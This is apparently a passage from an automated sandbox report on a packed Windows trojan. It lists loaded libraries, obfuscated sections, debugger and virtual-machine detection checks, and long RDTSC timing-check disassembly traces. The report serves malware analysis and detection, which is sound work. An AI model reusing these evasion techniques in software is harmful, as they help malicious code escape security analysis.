              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB65401_2_00EB6540
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D87EA81_2_00D87EA8
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DACE021_2_00DACE02
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00F607E41_2_00F607E4
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBAFC41_2_00EBAFC4
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00B04A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: vxwrnjjb ZLIB complexity 0.9949987173152934
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B23A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_00B23A50
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_00B1CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\AV4ZTEY7.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeReversingLabs: Detection: 39%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1789952 > 1048576
              Source: file.exeStatic PE information: Raw size of vxwrnjjb is bigger than: 0x100000 < 0x19b200

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.b00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vxwrnjjb:EW;aqjwqyrz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vxwrnjjb:EW;aqjwqyrz:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B26390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00B26390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b8f86 should be: 0x1c3a22
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: vxwrnjjb
              Source: file.exeStatic PE information: section name: aqjwqyrz
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00F390E0 push ebx; mov dword ptr [esp], 56D087C3h1_2_00F39124
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00F368EF push ecx; mov dword ptr [esp], ebx1_2_00F36A3B
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00F368EF push 64E87815h; mov dword ptr [esp], ecx1_2_00F36A6A
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00F368EF push 0958F400h; mov dword ptr [esp], esi1_2_00F36A83
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00F368EF push 598A51CCh; mov dword ptr [esp], eax1_2_00F36AEA
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00F368EF push 5618F227h; mov dword ptr [esp], edi1_2_00F36B18
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B27895 push ecx; ret 1_2_00B278A8
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EF20D5 push ebx; mov dword ptr [esp], esi1_2_00EF2477
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push ebx; mov dword ptr [esp], 510481D1h1_2_00EB28C9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push 1751558Dh; mov dword ptr [esp], eax1_2_00EB29BF
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push 4FB38305h; mov dword ptr [esp], edx1_2_00EB2A0E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push ecx; mov dword ptr [esp], 4984A13Fh1_2_00EB2A37
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push 26E30640h; mov dword ptr [esp], ebp1_2_00EB2ABF
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push ebp; mov dword ptr [esp], esi1_2_00EB2AC3
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push ebx; mov dword ptr [esp], edi1_2_00EB2C06
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push 6291891Ah; mov dword ptr [esp], ebx1_2_00EB2CBA
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push 72070B80h; mov dword ptr [esp], esi1_2_00EB2CC5
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push ebx; mov dword ptr [esp], 6DD9B895h1_2_00EB2D39
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push ebp; mov dword ptr [esp], 2E7F4AF6h1_2_00EB2D71
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push edi; mov dword ptr [esp], 2E5C72AEh1_2_00EB2D8B
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push 4CCC83ABh; mov dword ptr [esp], ebp1_2_00EB2E05
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push edx; mov dword ptr [esp], ebp1_2_00EB2E68
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push edi; mov dword ptr [esp], ebp1_2_00EB2EBE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push 3B82BC07h; mov dword ptr [esp], esi1_2_00EB2EFA
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push edi; mov dword ptr [esp], ecx1_2_00EB2F30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push 5483F852h; mov dword ptr [esp], ebp1_2_00EB2F75
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push ebx; mov dword ptr [esp], 3AA67757h1_2_00EB2F8F
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push ecx; mov dword ptr [esp], edx1_2_00EB300F
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push ecx; mov dword ptr [esp], ebp1_2_00EB3031
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push edx; mov dword ptr [esp], 6386EFA3h1_2_00EB30DF
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE push edi; mov dword ptr [esp], 59FF1181h1_2_00EB30EA
              Source: file.exeStatic PE information: section name: vxwrnjjb entropy: 7.9545182277365285

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B26390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00B26390

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-25663
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5011C second address: D50126 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D50126 second address: D5012D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB3EF0 second address: EB3EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECAD86 second address: ECADB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6E390E37F2h 0x0000000f pop eax 0x00000010 push edi 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECADB8 second address: ECADBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECADBE second address: ECADC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECADC7 second address: ECADCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECADCD second address: ECADD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECAF28 second address: ECAF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6E3947E056h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECD9F8 second address: ECD9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECD9FC second address: ECDA99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F6E3947E069h 0x0000000d pushad 0x0000000e jmp 00007F6E3947E064h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 nop 0x00000018 sub dx, 8164h 0x0000001d jg 00007F6E3947E065h 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007F6E3947E058h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f call 00007F6E3947E059h 0x00000044 pushad 0x00000045 pushad 0x00000046 jmp 00007F6E3947E064h 0x0000004b jg 00007F6E3947E056h 0x00000051 popad 0x00000052 push esi 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDA99 second address: ECDAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F6E390E37E6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDAA9 second address: ECDAAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDAAD second address: ECDAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c jmp 00007F6E390E37F3h 0x00000011 pop ebx 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007F6E390E37E6h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDAD9 second address: ECDAE3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDAE3 second address: ECDAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDAE9 second address: ECDB67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E3947E061h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jc 00007F6E3947E068h 0x00000015 pushad 0x00000016 jmp 00007F6E3947E05Ah 0x0000001b ja 00007F6E3947E056h 0x00000021 popad 0x00000022 pop eax 0x00000023 sub edx, 0EFC9FA1h 0x00000029 push 00000003h 0x0000002b jmp 00007F6E3947E05Ch 0x00000030 push 00000000h 0x00000032 push 00000003h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F6E3947E058h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e mov edi, dword ptr [ebp+122D2940h] 0x00000054 push 6CB48285h 0x00000059 push eax 0x0000005a push edx 0x0000005b jno 00007F6E3947E058h 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDB67 second address: ECDBB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 534B7D7Bh 0x00000010 push ecx 0x00000011 mov dword ptr [ebp+122D3731h], eax 0x00000017 pop edi 0x00000018 lea ebx, dword ptr [ebp+124518BDh] 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F6E390E37E8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 push eax 0x00000039 pushad 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d pushad 0x0000003e popad 0x0000003f popad 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDCB1 second address: ECDCBB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDDC6 second address: ECDE19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D379Ch], ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F6E390E37E8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f xor dword ptr [ebp+122D1B94h], ecx 0x00000035 call 00007F6E390E37E9h 0x0000003a pushad 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDE19 second address: ECDE47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6E3947E056h 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F6E3947E069h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0BB6 second address: EE0BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0BBA second address: EE0BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0BC4 second address: EE0BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB23B2 second address: EB23C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6E3947E056h 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EECB61 second address: EECB67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED0C8 second address: EED0F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E3947E065h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F6E3947E062h 0x00000012 jc 00007F6E3947E056h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED0F2 second address: EED0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED0F6 second address: EED102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F6E3947E056h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED267 second address: EED26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED26D second address: EED288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E3947E05Ah 0x00000009 popad 0x0000000a jne 00007F6E3947E05Ch 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED288 second address: EED28E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED463 second address: EED4B0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F6E3947E056h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b je 00007F6E3947E056h 0x00000011 jmp 00007F6E3947E068h 0x00000016 jmp 00007F6E3947E066h 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 jg 00007F6E3947E056h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED4B0 second address: EED4B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED634 second address: EED63E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6E3947E056h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED7B5 second address: EED7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED7B9 second address: EED7C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEDAA6 second address: EEDAAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEDBE6 second address: EEDC0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F6E3947E056h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jl 00007F6E3947E056h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 jg 00007F6E3947E056h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE5BE9 second address: EE5C08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E390E37F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE5C08 second address: EE5C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEDF06 second address: EEDF0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEDF0A second address: EEDF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F6E3947E05Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEE6BB second address: EEE6C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F6E390E37E6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEE6C5 second address: EEE6C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0FD7 second address: EF0FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jo 00007F6E390E37E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBE085 second address: EBE0A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6E3947E065h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBE0A3 second address: EBE0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF5C2F second address: EF5C50 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E3947E056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F6E3947E05Ch 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F6E3947E056h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFA7BE second address: EFA7CF instructions: 0x00000000 rdtsc 0x00000002 js 00007F6E390E37E6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFAC1B second address: EFAC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFAC21 second address: EFAC25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFAC25 second address: EFAC2D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFAC2D second address: EFAC33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFAC33 second address: EFAC37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
